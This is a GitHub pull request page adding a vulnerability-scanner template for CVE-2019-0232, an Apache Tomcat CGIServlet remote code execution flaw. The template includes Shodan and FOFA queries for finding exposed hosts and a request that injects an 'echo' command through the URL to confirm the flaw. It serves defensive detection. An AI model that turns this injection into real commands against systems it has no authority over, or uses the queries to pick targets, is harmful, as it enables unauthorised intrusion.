Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Create CVE-2019-0232.yaml #10815

Merged
merged 2 commits into from
Sep 24, 2024
Merged

Create CVE-2019-0232.yaml #10815

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
977590a
Create CVE-2019-0232.yaml
DhiyaneshGeek Sep 23, 2024
3b8be59
wrong matcher update
ritikchaddha Sep 24, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
61 changes: 61 additions & 0 deletions http/cves/2019/CVE-2019-0232.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,61 @@
id: CVE-2019-0232

info:
name: Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
author: DhiyaneshDk
severity: high
description: |
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
reference:
- http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2019/May/4
- https://access.redhat.com/errata/RHSA-2019:1712
- https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
- https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2019-0232
cwe-id: CWE-78
epss-score: 0.97373
epss-percentile: 0.99927
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
vendor: apache
product: tomcat
shodan-query:
- http.html:"apache tomcat"
- http.title:"apache tomcat"
- http.html:"jk status manager"
- cpe:"cpe:2.3:a:apache:tomcat"
fofa-query:
- body="jk status manager"
- body="apache tomcat"
- title="apache tomcat"
google-query: intitle:"apache tomcat"
tags: cve,cve2019,packetstorm,seclists,apache,tomcat

variables:
sid: "{{rand_text_alpha(10)}}"

http:
- raw:
- |
GET /?&echo+{{sid}} HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{sid}}"

- type: word
part: content_type
words:
- "text/plain"

- type: status
status:
- 200
Loading